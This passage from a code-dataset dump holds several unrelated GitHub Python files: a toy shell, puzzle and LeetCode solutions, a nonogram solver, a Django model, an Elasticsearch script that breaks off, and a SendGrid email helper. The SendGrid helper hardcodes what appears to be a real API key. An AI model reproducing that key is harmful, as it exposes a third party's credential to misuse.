unsafe\n\n def exec(self, args) -> str:\n return os.getcwd() + \"\\n\"\n\n\nclass Cd(Application):\n \"\"\"\n Cd implements the 'cd' shell function\n It changes the current working directory.\n \"\"\"\n\n def __init__(self, unsafe) -> None:\n self.unsafe = unsafe\n\n def exec(self, args) -> List[str]:\n output = []\n if len(args) == 0 or len(args) > 1:\n self.raise_error(\n \"Wrong number of command line arguments\",\n \"type\",\n output\n )\n if not os.path.exists(args[0]):\n self.raise_error(\n f\"No such directory: {args[0]}\",\n \"not_directory\",\n output\n )\n else:\n os.chdir(args[0])\n\n return output\n\n\nclass Ls(Application):\n \"\"\"\n Ls implements the 'ls' shell function\n Lists the content of a directory.\n It prints list of files and directories\n separated by tabs and followed by a newline.\n Ignores files and directories whose names start with '.' 
.\n \"\"\"\n\n def __init__(self, unsafe) -> None:\n self.unsafe = unsafe\n\n def exec(self, args) -> List[str]:\n output = []\n if len(args) == 0:\n ls_dir = os.getcwd()\n elif len(args) > 1:\n self.raise_error(\n \"Wrong number of command line arguments\",\n \"type\",\n output\n )\n ls_dir = args[0]\n else:\n ls_dir = args[0]\n if not os.path.exists(ls_dir):\n self.raise_error(\n f\"No such directory: {ls_dir}\",\n \"not_directory\",\n output\n )\n else:\n for f in listdir(ls_dir):\n if not f.startswith(\".\"):\n output.append(f + \"\\n\")\n\n return output\n\n\nclass Cat(Application):\n \"\"\"\n Cat implements the 'cat' shell function\n It concatenates the content of given files\n and prints to stdout\n \"\"\"\n\n def __init__(self, unsafe) -> None:\n self.unsafe = unsafe\n\n def exec(self, args) -> List[str]:\n output = []\n if len(args) == 0:\n self.raise_error(\"No file specified\", \"type\", output)\n return output\n for a in args:\n if \"#STDIN#\" in a:\n f = a[1:]\n for x in f:\n output.append(x)\n else:\n if not os.path.exists(a):\n self.raise_error(\n f\"No such file or directory: {a}\",\n \"file_not_found\",\n output\n )\n else:\n with open(a) as f:\n output.append(f.read())\n\n if output[-1][-2:] != \"\\n\":\n output.append(\"\\n\")\n return output\n\n\nclass Echo(Application):\n \"\"\"\n Echo implements the 'echo' shell function\n It prints its args seperated by spaces\n and followed by newline to stdout\n \"\"\"\n\n def __init__(self, unsafe) -> None:\n self.unsafe = unsafe\n\n def exec(self, args) -> str:\n return \" \".join(args) + \"\\n\"\n\n\nclass Head(Application):\n \"\"\"\n Head implements the 'head' shell function\n Prints the first N lines of a given file or stdin\n If < N lines, it prints only existing lines without raising an exception\n \"\"\"\n\n def __init__(self, unsafe) -> None:\n self.unsafe = unsafe\n\n def exec(self, args) -> List[str]:\n output = []\n file = \"\"\n\n if len(args) != 1 and len(args) != 3:\n self.raise_error(\n \"Wrong number of command line arguments\",\n \"type\",\n output\n )\n return output\n if len(args) == 1:\n num_lines = 10\n file = args[0]\n if len(args) == 3:\n if args[0] != \"-n\":\n self.raise_error(\"Wrong flags\", \"value\", output)\n return output\n else:\n num_lines = int(args[1])\n file = args[2]\n\n if \"#STDIN#\" in file:\n file = file[1]\n lines = file.split(\"\\n\")\n for i in range(0, min(len(lines), num_lines)):\n output.append(lines[i] + \"\\n\")\n else:\n if not os.path.exists(file):\n self.raise_error(\n f\"No such file or directory: {file}\",\n \"file_not_found\",\n output\n )\n else:\n with open(file) as f:\n lines = f.readlines()\n for i in range(0, min(len(lines), num_lines)):\n if i == len(lines) - 1:\n output.append(lines[i] + \"\\n\")\n else:\n output.append(lines[i])\n\n return output\n\n\nclass Tail(Application):\n \"\"\"\n Tail implements the 'tail' shell function\n Prints the last N lines of a given file or stdin\n If < N lines, it prints only existing lines\n without raising an exception\n \"\"\"\n\n def __init__(self, unsafe) -> None:\n self.unsafe = unsafe\n\n def exec(self, args) -> List[str]:\n output = []\n file = \"\"\n\n if len(args) != 1 and len(args) != 3:\n self.raise_error(\n \"Wrong number of command line arguments\",\n \"type\",\n output\n )\n return output\n if len(args) == 1:\n num_lines = 10\n file = args[0]\n if len(args) == 3:\n if args[0] != \"-n\":\n self.raise_error(\"Wrong flags\", \"value\", output)\n return output\n else:\n num_lines = int(args[1])\n file = args[2]\n\n if 
\"#STDIN#\" in file:\n file = file[1]\n lines = file.split(\"\\n\")\n display_length = min(len(lines), num_lines) + 1\n for i in range(0, display_length):\n output.append(lines[len(lines) - display_length + i] + \"\\n\")\n else:\n if not os.path.exists(file):\n self.raise_error(\n f\"No such file or directory: {file}\",\n \"file_not_found\",\n output\n )\n else:\n with open(file) as f:\n lines = f.readlines()\n display_length = min(len(lines), num_lines)\n for i in range(0, display_length):\n if i == display_length - 1:\n output.append(\n lines[len(lines) - display_length + i]\n + \"\\n\"\n )\n else:\n output.append(\n lines[len(lines) - display_length + i]\n )\n\n return output\n\n\nclass Grep(Application):\n \"\"\"\n Grep implements the 'grep' shell function\n It searches for lines containing a match to specified pattern\n Output of command is the list of lines found\n Each line is followed by a newline\n \"\"\"\n\n def __init__(self, unsafe) -> None:\n self.unsafe = unsafe\n\n def exec(self, args) -> List[str]:\n output = []\n if len(args) < 2:\n self.raise_error(\n \"Wrong number of command line arguments\",\n \"type\",\n output\n )\n return output\n\n pattern = args[0]\n files = args[1:]\n for file in files:\n if \"#STDIN#\" in file:\n file = file[1]\n for line in file.split(\"\\n\"):\n if line != \"\":\n if re.match(pattern, line):\n output.append(line + \"\\n\")\n else:\n if not os.path.exists(file):\n self.raise_error(\n f\"No such file or directory: {file}\",\n \"file_not_found\",\n output\n )\n else:\n with open(file) as f:\n lines = f.readlines()\n for line in lines:\n if re.match(pattern, line):\n if len(files) > 1:\n match_string = (\n file +\n \":\" +\n line.replace(\"\\n\", \"\") + \"\\n\"\n )\n output.append(match_string)\n else:\n output.append(\n line.replace(\"\\n\", \"\")\n + \"\\n\"\n )\n\n return output\n\n\nclass Cut(Application):\n \"\"\"\n Cut implements the 'cut' shell function\n It cuts out sections from each line of a given file or stdin\n Outputs result to stdout\n \"\"\"\n\n def __init__(self, unsafe) -> None:\n self.unsafe = unsafe\n\n def exec(self, args) -> List[str]:\n output = []\n if len(args) != 3:\n self.raise_error(\n \"Wrong number of command line arguments\",\n \"type\",\n output\n )\n return output\n if args[0] != \"-b\":\n self.raise_error(\"Wrong flags\", \"value\", output)\n return output\n\n bytes = args[1].split(\",\")\n indexs = []\n file = args[2]\n\n if \"#STDIN#\" in file:\n file = file[1]\n lines = file.split(\"\\n\")\n else:\n if not os.path.exists(file):\n self.raise_error(\n f\"No such file or directory: {file}\",\n \"file_not_found\",\n output\n )\n return output\n else:\n with open(file) as f:\n lines = f.readlines()\n\n for byte in bytes:\n if \"-\" not in byte:\n if (int(byte) - 1) not in indexs:\n indexs.append(int(byte) - 1)\n elif byte[0] == \"-\":\n for i in range(0, int(byte[1:])):\n if i not in indexs:\n indexs.append(i)\n elif byte[-1] == \"-\":\n for i in range(int(byte[:-1]) - 1, len(max(lines, key=len))):\n if i not in indexs:\n indexs.append(i)\n else:\n indexRange = byte.split(\"-\")\n for i in range(int(indexRange[0]) - 1, int(indexRange[1])):\n if i not in indexs:\n indexs.append(i)\n\n indexs.sort()\n\n for line in lines:\n line = line.strip(\"\\n\")\n newLine = \"\"\n for i in indexs:\n if i < len(line):\n newLine = newLine + line[i]\n output.append(newLine + \"\\n\")\n\n return output\n\n\nclass Find(Application):\n \"\"\"\n Find implements the 'find' shell function\n It recursively searches for files with matching 
names\n Outputs list of relative paths, each followed by newline\n \"\"\"\n\n def __init__(self, unsafe) -> None:\n self.unsafe = unsafe\n\n def exec(self, args) -> List[str]:\n output = []\n initPathLength = len(os.getcwd())\n path = args[0]\n\n def recursive_find(path):\n files = os.listdir(path)\n for file in files:\n newPath = os.path.join(path, file)\n if args[0] != \"-name\":\n # outputs absolute path if directory is given at the start\n output.append(newPath + \"\\n\")\n elif args[0] == \"-name\":\n # replace absolute path with relative path if no dir given\n output.append(\".\" + newPath[initPathLength:] + \"\\n\")\n\n if os.path.isdir(newPath):\n recursive_find(newPath)\n\n # If no directory is given, use current working directory\n if args[0] == \"-name\":\n path = os.getcwd()\n if args[0] != \"-name\" and not os.path.exists(args[0]):\n self.raise_error(\n f\"Directory given does not exist: {args[0]}\",\n \"not_directory\",\n output\n )\n return output\n if \"-name\" not in args:\n recursive_find(path)\n if args[len(args) - 1] == \"-name\":\n self.raise_error(\n \"-name requires additional arguments\",\n \"type\",\n output\n )\n return output\n\n # If globbing wildcard is given, this runs instead.\n elif len(args) > 1:\n s = args[len(args) - 1]\n concPath = path + \"/**/\" + s\n files = glob.glob(concPath, recursive=True)\n if args[0] != \"-name\":\n for file in files:\n output.append(file + \"\\n\")\n elif args[0] == \"-name\":\n for file in files:\n output.append(\".\" + file[initPathLength:] + \"\\n\")\n\n return output\n\n\nclass Uniq(Application):\n \"\"\"\n Uniq implements the 'uniq' shell function\n It detects and deletes adjacent duplicate lines from an input file/stdin\n Outputs result to stdout\n \"\"\"\n\n def __init__(self, unsafe) -> None:\n self.unsafe = unsafe\n\n def exec(self, args) -> List[str]:\n output = []\n\n if len(args) > 2:\n self.raise_error(\n \"Wrong number of command line arguments\",\n \"type\",\n output\n )\n return output\n if len(args) == 1:\n file = args[0]\n case = 0\n if len(args) == 2:\n if args[0] != \"-i\":\n self.raise_error(\"Wrong flags\", \"value\", output)\n return output\n else:\n case = 1\n file = args[1]\n\n if \"#STDIN#\" in file:\n contents = []\n for lines in file[1:]:\n for line in lines.split(\"\\n\"):\n if line != \"\":\n contents.append(line)\n else:\n if not os.path.exists(file):\n self.raise_error(\n f\"No such file or directory: {file}\",\n \"file_not_found\",\n output\n )\n return output\n else:\n with open(file, \"r\") as f:\n contents = f.read().splitlines()\n\n indexToRemove = []\n\n if case == 0:\n for i in range(0, len(contents) - 1):\n if contents[i] == contents[i + 1]:\n indexToRemove.append(i + 1)\n\n else:\n for i in range(0, len(contents) - 1):\n j = i\n while (\n (j + 1) < len(contents)\n and contents[j].lower() == contents[j + 1].lower()):\n if (j + 1) not in indexToRemove:\n indexToRemove.append(j + 1)\n j += 1\n\n indexToRemove.sort(reverse=True)\n\n for index in indexToRemove:\n contents.pop(index)\n\n for line in contents:\n output.append(line + \"\\n\")\n\n return output\n\n\n# TODO Implement sort from Robins branch\nclass Sort(Application):\n \"\"\"\n Sort implements the 'sort' shell function\n It sorts the contents of a file/stdin line by line\n Outputs results to stdout\n \"\"\"\n\n def __init__(self, unsafe) -> None:\n self.unsafe = unsafe\n\n def exec(self, args) -> List[str]:\n output = []\n\n rev = 0 # reverse order true/false\n if len(args) > 2:\n self.raise_error(\n \"Wrong number of command line 
arguments\",\n \"type\",\n output\n )\n return output\n if len(args) == 1:\n file = args[0]\n if len(args) == 2:\n if args[0] != \"-r\":\n self.raise_error(\n \"Wrong flags\",\n \"value\",\n output\n )\n return output\n else:\n rev = 1\n file = args[1]\n\n if \"#STDIN#\" in file:\n contents = []\n for lines in file[1:]:\n for line in lines.split(\"\\n\"):\n if line != \"\":\n contents.append(line)\n else:\n if not os.path.exists(file):\n self.raise_error(\n f\"No such file or directory: {file}\",\n \"file_not_found\",\n output\n )\n return output\n else:\n with open(file, \"r\") as f:\n contents = f.read().splitlines()\n\n contents.sort()\n if rev == 1:\n contents = contents[::-1]\n\n for line in contents:\n output.append(line + \"\\n\")\n\n return output\n","repo_name":"charliebarber/shell","sub_path":"src/applications/applications.py","file_name":"applications.py","file_ext":"py","file_size_in_byte":18704,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"5895460681","text":"#!/usr/bin/python3\nimport sys\nimport numpy as np\nfrom scipy.spatial.distance import cdist\n\ncoords = [tuple(int(s.strip()) for s in l.strip().split(','))\n for l in sys.stdin.readlines()]\nxmax = max(x for x, y in coords)\nymax = max(y for x, y in coords)\nshape = (xmax + 1, ymax + 1)\nR = max(*shape)\n\ngrid = np.zeros(shape, dtype=int)\n# this can't be the easiest way to do this...\nindices = np.asarray(list(np.ndindex(grid.shape)))\ndist = cdist(indices, coords, metric='cityblock')\ncost = np.sum(dist, axis=1)\n\nprint(np.count_nonzero(cost < 10000))\n","repo_name":"acarapetis/advent-of-code-2018","sub_path":"problem12.py","file_name":"problem12.py","file_ext":"py","file_size_in_byte":555,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"24210589112","text":"from sys import stdin\n\n\ndef exe(x):\n cou = 0\n l = []\n while cou < int(x):\n y = stdin.readline()\n z = stdin.readline()\n total_len = 0\n rope_len = z.split()\n\n i = 0\n for _ in rope_len:\n rope_len[i] = int(rope_len[i])\n i += 1\n\n for q in rope_len:\n total_len += q\n total_len -= 2\n\n l.append(total_len + 2)\n cou += 1\n\n for r in l:\n print(r)\n\nc = stdin.readline()\nexe(c)\n","repo_name":"ppkavinda/HacKerRank","sub_path":"ropes.py","file_name":"ropes.py","file_ext":"py","file_size_in_byte":491,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"16059332472","text":"class Solution:\n def threeSumClosest(self, nums, target):\n \"\"\"\n :type nums: List[int]\n :type target: int\n :rtype: int\n \"\"\"\n nums.sort()\n result = nums[0] + nums[1] + nums[2]\n\n for i in range(len(nums) - 2):\n j, k = i+1, len(nums) - 1\n while j < k:\n tmp_sum = nums[i] + nums[j] + nums[k]\n if tmp_sum == target:\n return tmp_sum\n\n if abs(tmp_sum - target) < abs(result - target):\n result = tmp_sum\n\n if tmp_sum < target:\n j += 1\n elif tmp_sum > target:\n k -= 1\n\n return result\n","repo_name":"alekfed/leetcode-solutions-python","sub_path":"0016.3sum-closest.py","file_name":"0016.3sum-closest.py","file_ext":"py","file_size_in_byte":713,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"34137662993","text":"#\n# @lc app=leetcode id=313 lang=python3\n#\n# [313] Super Ugly Number\n#\n# https://leetcode.com/problems/super-ugly-number/description/\n#\n# algorithms\n# Medium (42.59%)\n# Total Accepted: 65.3K\n# Total Submissions: 153.3K\n# Testcase Example: '12\\n[2,7,13,19]'\n#\n# Write a program to find the nth super ugly number.\n# \n# Super ugly numbers are positive numbers whose all prime factors are in the\n# given prime list primes of size k.\n# \n# Example:\n# \n# \n# Input: n = 12, primes = [2,7,13,19]\n# Output: 32 \n# Explanation: [1,2,4,7,8,13,14,16,19,26,28,32] is the sequence of the first\n# 12 \n# super ugly numbers given primes = [2,7,13,19] of size 4.\n# \n# Note:\n# \n# \n# 1 is a super ugly number for any given primes.\n# The given numbers in primes are in ascending order.\n# 0 < k ≤ 100, 0 < n ≤ 106, 0 < primes[i] < 1000.\n# The nth super ugly number is guaranteed to fit in a 32-bit signed integer.\n# \n# \n#\n\n\n\nimport bisect\nfrom queue import PriorityQueue\nfrom collections import defaultdict, Counter\nimport heapq\nimport math\nfrom operator import mul\nfrom functools import reduce\nfrom itertools import count\nfrom pprint import pprint\n# from functools import lru_cache\nclass Solution:\n # def nthSuperUglyNumber(self, n: int, primes: List[int]) -> int:\n def nthSuperUglyNumber2(self, n: int, primes) -> int:\n\n l = [1]\n d = defaultdict(lambda: False)\n d[1] = True\n def recur(n):\n if n == 1:\n return 1\n else:\n last = recur(n-1)\n for p in primes:\n num = p*last\n if num > l[-1]:\n l.append(num)\n d[num] = True\n else:\n if not d[num]:\n bisect.insort_left(l, num)\n d[num] = True\n # break\n # print(l)\n return l[n-1]\n return recur(n)\n\n\n\n def nthSuperUglyNumber1(self, n: int, primes) -> int:\n\n pq = []\n d = defaultdict(lambda: False)\n heapq.heappush(pq, 1)\n d[1] = True\n for i in range(0, n):\n num = heapq.nsmallest(i+1, pq)[-1]\n for p in primes:\n r = p*num\n if not d[r]:\n # print(pq)\n heapq.heappush(pq, r)\n d[r] = True\n # print(sorted(pq))\n return heapq.nsmallest(n, pq)[-1]\n\n\n\n def nthSuperUglyNumber(self, n: int, primes) -> int:\n pq = []\n d = defaultdict(lambda: False)\n pq = [1]\n d[1] = True\n for i in range(0, n):\n for p in primes:\n r = p*pq[i]\n if not d[r]:\n if r > pq[-1]:\n pq.append(r)\n else:\n bisect.insort_left(pq, r)\n d[r] = True\n return pq[n-1]\n\n\n\n \n\n # for i in range(1,13):\n # print(next(hq2(i)))\n # print(next(hq2(12)))\n\n\n # return hq2(n)\n\n\n def nthSuperUglyNumber3(self, n: int, primes) -> int:\n base = primes[0]\n m = list(map(lambda x: math.log(x, base), primes))\n # print('m=', m)\n l = list(zip(m, range(len(primes))))\n template = []\n\n # pq = PriorityQueue()\n pq = []\n # heapq.heappush(pq, 1)\n\n\n for v,k in l:\n t = [0]*len(primes)\n t[k]=1\n template.append(t)\n heapq.heappush(pq, (v,t)) \n\n # print(template)\n\n\n\n def get_new_kv(l):\n # print('get_new_kv')\n i = -1\n me = values[i]\n k = ks[i]\n # print(values, me)\n # print(ks)\n temp = []\n while me + values[i-1]>me:\n temp.append((me + values[i-1],[a+b for a,b in zip(k, ks[i-1])]))\n i -= 1\n # print('temp=', temp)\n for v,k in temp:\n heapq.heappush(pq, (v,k))\n # print(sorted(pq))\n\n l = [1]\n c = 1\n values = [0]\n ks = []\n\n\n multiples_of_primes = []\n\n def add_to_multiples_of_primes(start):\n for i in range(len(m)):\n multiples_of_primes.append((start*m[i], [t*start for t in template[i]]))\n\n ct = count(2)\n # print(pq)\n while c < n:\n if pq:\n v, k = heapq.heappop(pq)\n else:\n # print('here', 
multiples_of_primes)\n v, k = multiples_of_primes.pop(0)\n\n\n temp_v = v\n\n if not multiples_of_primes:\n add_to_multiples_of_primes(next(ct))\n\n while multiples_of_primes[0][0] < temp_v:\n sv, sk = multiples_of_primes.pop(0)\n # print('here', sv, si)\n # print(len(multiples_of_primes))\n if not multiples_of_primes:\n add_to_multiples_of_primes(next(ct))\n values.append(sv)\n ks.append(sk)\n item = reduce(mul, (p**i for p, i in zip(primes, sk) if i != 0))\n l.append(item)\n c += 1\n get_new_kv(l)\n temp_v = sv\n if c == n:\n # print('here')\n break\n # print('l=', l,c)\n values.append(v)\n ks.append(k)\n item = reduce(mul, (p**i for p, i in zip(primes, k) if i != 0))\n if item > l[-1]:\n l.append(item)\n c += 1\n get_new_kv(l)\n # print('l=', l)\n return l[-1]\n\n\n\n def nthSuperUglyNumber2(self, n: int, primes) -> int:\n\n\n debug = False\n # debug = True\n\n\n table = [[0]*len(primes) for _ in range(n)]\n \n table[0] = [1]*len(primes)\n\n def fill(r, c): \n val = primes[c] * l[r-1]\n max_col[c] = val, r, c\n return val\n\n # pprint(table)\n c = 1\n \n max_col = list(zip(primes, [0]*len(primes), range(len(primes))))\n # print(max_col)\n l = [1]\n \n\n\n pq = PriorityQueue()\n\n for i, v in enumerate(primes):\n pq.put((v, i))\n\n\n\n # pq.put((0, primes[0]))\n\n\n\n mx = primes[0]\n cr, cl = 0, 0\n\n\n\n\n\n\n\n while c < n:\n # current row, current col\n\n \n \n mx, cl = pq.get()\n cr = max_col[cl][1]\n\n if debug:\n # print('max_col=', max_col)\n print('cr=', cr, 'cl=', cl, 'mx=', mx)\n # print(' pk=', pk, 'pv=', pv)\n\n\n if cl == 0:\n\n # if primes[cl] * table[cr][cl] <= mx:\n if primes[cl] * table[cr][cl] == mx:\n if debug:\n print('cr=', cr, 'cl=', cl)\n print(primes[cl] * table[cr][cl], mx, primes[cl] * table[cr][cl] == mx)\n cr += 1\n table[cr][cl] = primes[cl] * table[cr-1][cl]\n max_col[cl] = table[cr][cl], cr, cl\n\n if table[cr][cl] > l[-1]:\n if debug:\n print(table[cr][cl], 'added to l')\n l.append(table[cr][cl])\n c += 1\n\n\n\n else:\n\n if cl < len(primes)-1:\n \n # if primes[cl] * l[cr] <= mx:\n if primes[cl] * l[cr] == mx:\n if debug:\n print('cr=', cr, 'cl=', cl)\n print(primes[cl] * l[cr], mx, primes[cl] * l[cr] == mx)\n\n cr += 1\n table[cr][cl] = fill(cr,cl)\n if table[cr][cl] > l[-1]:\n if debug:\n print(table[cr][cl], 'added to l')\n l.append(table[cr][cl])\n c += 1\n\n else:\n if debug:\n print('last column')\n\n cr += 1\n table[cr][cl] = fill(cr,cl)\n if table[cr][cl] > l[-1]:\n if debug: print(table[cr][cl], 'added to l')\n l.append(table[cr][cl])\n c += 1\n \n\n # if debug: pprint(table)\n\n if cl == 0:\n mx = max_col[cl][0] * primes[0]\n else:\n mx = primes[cl] * l[max_col[cl][1]]\n # print('mx=', mx, max_col[cl])\n\n pq.put((mx, cl))\n \n \n\n if debug:\n print(l,c)\n print(\"=\"*30)\n\n\n return l[-1]\n\n def nthSuperUglyNumber_final(self, n: int, primes) -> int:\n lp = len(primes)\n indices = [0]*lp\n l = [1]*n\n pq = list(zip(primes, range(lp)))\n heapq.heapify(pq)\n c, mx = 1, 1\n while c < n:\n val, i = heapq.heappop(pq)\n indices[i] += 1\n if val > mx:\n l[c] = val\n mx = val\n c += 1\n if i == 0:\n val *= primes[i]\n else:\n val = primes[i] * l[indices[i]]\n heapq.heappush(pq, (val, i))\n return l[-1]\n\ns = Solution()\n\n\nimport time\n\nstart = time.time()\n# print(\"hello\")\n\nn = 12\nprimes = [2,7,13,19]\nprint(s.nthSuperUglyNumber(n, primes)==32)\n\n\nn = 100000\n# n = 300\nprimes = [7,19,29,37,41,47,53,59,61,79,83,89,101,103,109,127,131,137,139,157,167,179,181,199,211,229,233,239,241,251]\na = s.nthSuperUglyNumber(n, primes)\nprint(a)\n# b = 
s.nthSuperUglyNumber2(n, primes)\n# print(a == 1092889481)\n# print(b)\n# print(a==b)\n\n\n\n\n\n\n# print()\nn = 35\nprimes = [2,3,11,13,17,23,29,31,37,47]\n# print(s.nthSuperUglyNumber(n, primes) == 62) # 62\n\n\n\nn = 4\nprimes = [2,3,5]\nprint(s.nthSuperUglyNumber(n, primes) == 4)\n\n\nn = 3\nprimes = [2]\nprint(s.nthSuperUglyNumber(n, primes) == 4)\n\n\n\nend = time.time()\nprint(end - start)\n\n\n\n\n\n\n\n\n\n\n\n \n","repo_name":"nickyfoto/lc","sub_path":"python/313.super-ugly-number.py","file_name":"313.super-ugly-number.py","file_ext":"py","file_size_in_byte":10136,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"24800562702","text":"import sys\ninput = sys.stdin.readline\n\n\nn = int(input())\nm = int(input())\na = list(map(int, input().split()))\nphoto = dict()\n\nfor i in range(m):\n\n if a[i] in photo:\n photo[a[i]][0] += 1\n else:\n if len(photo) == n:\n del photo[a[sorted(photo.values())[0][1]]]\n photo[a[i]] = [1, i]\n\nprint(' '.join(map(str, sorted(photo.keys()))))\n","repo_name":"JUNGJUNSEO/baekjun","sub_path":"백준/1713_후보 추천하기_220511.py","file_name":"1713_후보 추천하기_220511.py","file_ext":"py","file_size_in_byte":367,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"7778845259","text":"from functools import reduce, lru_cache\nfrom random import choice, shuffle, randrange, randint\nfrom collections import deque\nfrom queue import PriorityQueue\n#min of hamming distances between all 01 sentences with d-ones\n\nwith open(\"zad_input.txt\") as f:\n inp = [[int(c) for c in row.split(\" \") if c] for row in f.read().split(\"\\n\") if row]\n [K,M] = inp[0]\n rows = inp[1:K+1]\n columns = inp[-M:]\n\ndef transpose(matrix):\n return [[matrix[a][b] for a in range(len(matrix))] for b in range(len(matrix[0]))]\n\ndef generate_all(n,a):\n if n <= 0:\n if not a:\n return [[]]\n else:\n return []\n if not a:\n return [[0]*n]\n [a1, *at] = a\n return [[0]*i + [1]*a1 + ([0] if at else []) + other for i in range(0, n) for other in generate_all(n-a1-i-(1 if at else 0), at) if len([0]*i + [1]*a1 + ([0] if at else []) + other) == n]\n\ndef solve(row_values, column_values):\n\n def allowable(row):\n def _and_pixel(x,y):\n return x if x == y else 2\n return reduce(lambda a, b: [_and_pixel(x,y) for x, y in zip(a, b)], row)\n\n def show(m):\n return \"\\n\".join(\"\".join(\".#?\"[i] for i in x) for x in m)\n\n w, h = len(column_values), len(row_values)\n rows = [generate_all(w, x) for x in row_values]\n cols = [generate_all(h, x) for x in column_values]\n can_do = [allowable(row) for row in rows]\n\n def _can_fit(x,y):\n return x == y or x == 2 or y == 2\n\n def fits(a, b):\n return all(_can_fit(x,y) for x, y in zip(a, b))\n\n def fix_col(n):\n c = [x[n] for x in can_do]\n cols[n] = [x for x in cols[n] if fits(x, c)]\n for i, x in enumerate(allowable(cols[n])):\n if x != can_do[i][n]:\n fillable_rows.add(i)\n can_do[i][n] = x if _can_fit(x, can_do[i][n]) else 2\n\n def fix_row(n):\n c = can_do[n]\n rows[n] = [x for x in rows[n] if fits(x, c)]\n for i, x in enumerate(allowable(rows[n])):\n if x != can_do[n][i]:\n fillable_cols.add(i)\n can_do[n][i] = x if _can_fit(x, can_do[n][i]) else 2\n\n fillable_rows, fillable_cols = set(), set(range(w))\n\n while fillable_cols:\n for i in fillable_cols:\n fix_col(i)\n fillable_cols = set()\n for i in fillable_rows:\n fix_row(i)\n fillable_rows = set()\n\n return show(can_do)\n\n\ndef print_board(board):\n return \"\\n\".join([\"\".join(map(str,row)) for row in board])\n\nwith open(\"zad_output.txt\", mode='w') as f:\n f.write(solve(rows,columns))\n","repo_name":"wekt0r/uni","sub_path":"Sztuczna Inteligencja/p3/z1.py","file_name":"z1.py","file_ext":"py","file_size_in_byte":2554,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"}
+{"seq_id":"9372425379","text":"import requests\n\nAPI_KEY = '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'\n\ndef send(destination, subject, message):\n\n post = requests.post(\n \"https://api.sendgrid.com/v3/mail/send\",\n headers={\n \"Authorization\": \"Bearer \" + API_KEY,\n \"Content-Type\": \"application/json\"\n },\n json = {\n \"personalizations\": [ {\n \"to\": [ { \"email\": destination } ],\n \"subject\": subject\n } ],\n\n \"from\": {\n \"email\": \"rotafestival@gmail.com\",\n \"name\": \"ROTA - Festival de Roteiro Audiovisual\"\n },\n\n \"content\": [ {\n \"type\": \"text/html\",\n \"value\": message\n } ]\n }\n\n )\n\n","repo_name":"1um0zero/rota","sub_path":"src/core/sendgrid.py","file_name":"sendgrid.py","file_ext":"py","file_size_in_byte":786,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"20855462593","text":"from django.db import models\nfrom users.models import BaseUser\n\n# Create your models here.\n\n\n\nclass Message(models.Model):\n \"\"\" Class that is the framework for all messages that get registered into the database\n\n \"\"\"\n\n from_user = models.ForeignKey(BaseUser, null=True, related_name='creator')\n to_user = models.ForeignKey(BaseUser, null=True, related_name='receiver')\n subject_line = models.CharField(('Subject'), max_length=140, blank=True,)\n\n is_read = models.BooleanField(('Read'), default=False)\n\n body_text = models.CharField(('Body'), max_length=1000, blank=True,)\n\n def setAsRead(self):\n \"\"\" Flips the is_read boolean to determine if the message has been seen/read yet\n\n :return: n/a\n \"\"\"\n self.is_read = True","repo_name":"Gr34v0/DogeIncToolShare","sub_path":"messaging/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":769,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"69999824009","text":"import os\nimport pandas as pd\nfrom shapely.geometry import Point, Polygon\nfrom elasticsearch_config import es\nfrom elasticsearch.helpers import bulk\nfrom multiprocessing import Process, Manager\nimport time\n\nstart_time = time.time()\n\n# ---------- CREAR INDEX OG FIELD PRICES ----------\n\nog_mapp = es.indices.get_mapping(index=\"wells_coordinates_texas\")[\n \"wells_coordinates_texas\"\n]\n\nog_mapp[\"mappings\"][\"properties\"][\"geology_type\"] = {\n \"type\": \"text\",\n \"fields\": {\"keyword\": {\"type\": \"keyword\", \"ignore_above\": 256}},\n}\n\n\nes.indices.create(index=\"well_geology\", body=og_mapp, ignore=400)\n\n# ---------- IDENTIFICAR TIPO DE GEOLOGIA ----------\n\ngeology_index = \"tx_geol_poly\"\nwell = \"wells_coordinates_texas\"\nquery = {\"query\": {\"match_all\": {}}}\nindex_geology_hits = []\nwell_hits = []\n\n\ndef get_batch_data(index, data):\n res = es.search(index=index, body=query, size=10000, scroll=\"2m\")\n scroll_id = res[\"_scroll_id\"]\n hits = res[\"hits\"][\"hits\"]\n data.extend(hit[\"_source\"] for hit in hits)\n\n while len(hits) > 0:\n res = es.scroll(scroll_id=scroll_id, scroll=\"2m\")\n scroll_id = res[\"_scroll_id\"]\n hits = res[\"hits\"][\"hits\"]\n data.extend(hit[\"_source\"] for hit in hits)\n\n\ndef process_geology_hits():\n get_batch_data(geology_index, index_geology_hits)\n polygons = []\n\n for hit in index_geology_hits:\n coordinates = hit[\"geometry\"][\"coordinates\"][0]\n polygons.append(Polygon(coordinates))\n\n return polygons\n\n\ndef process_well_hit(well_hit, polygons, index_geology_hits, result):\n well_location = Point(*well_hit[\"geometry\"])\n for i, polygon in enumerate(polygons):\n if well_location.within(polygon):\n well_hit[\"geology_type\"] = index_geology_hits[i][\"GENERALIZE\"]\n result.append(well_hit)\n\n\ndef process_well_hits(well_hits, polygons, index_geology_hits, result):\n for well_hit in well_hits:\n process_well_hit(well_hit, polygons, index_geology_hits, result)\n\n\nif __name__ == \"__main__\":\n manager = Manager()\n result = manager.list()\n\n get_batch_data(well, well_hits)\n polygons = process_geology_hits()\n\n chunk_size = max(len(well_hits) // 10, 1)\n processes = []\n\n for i in range(0, len(well_hits), chunk_size):\n process = Process(\n target=process_well_hits,\n args=(well_hits[i : i + chunk_size], polygons, index_geology_hits, result),\n )\n processes.append(process)\n process.start()\n\n for process in processes:\n process.join()\n\n def ingestion_bulk(index_name, batch_size=5000):\n data = [{\"_index\": index_name, \"_source\": doc} for doc in result]\n len_data = len(data)\n\n for 